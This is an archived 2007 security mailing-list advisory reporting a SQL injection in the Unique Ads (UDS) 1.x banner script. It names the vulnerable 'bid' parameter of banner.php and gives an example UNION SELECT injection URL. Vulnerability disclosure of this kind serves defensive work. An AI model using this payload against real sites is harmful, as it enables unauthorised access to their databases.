OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
SQL Injection in Unique Ads ( UDS )

xx_hack_xx_2004hotmail.com
Date: Sat Jan 20 2007 - 20:21:25 CST


Hello
Vulnerable : uds
Version: 1.x
web : http://www.egyptechno.com

The bug :
http://example.com/uds/banner.php?bid=[SQL]

Example :
http://example.com/uds/banner.php?bid=-55%20union%20select%20null,null,null%20from%20uds

,,,,,,,
Discoverey By : Linux_Drox
www.LeZr.com

Best Regards ,,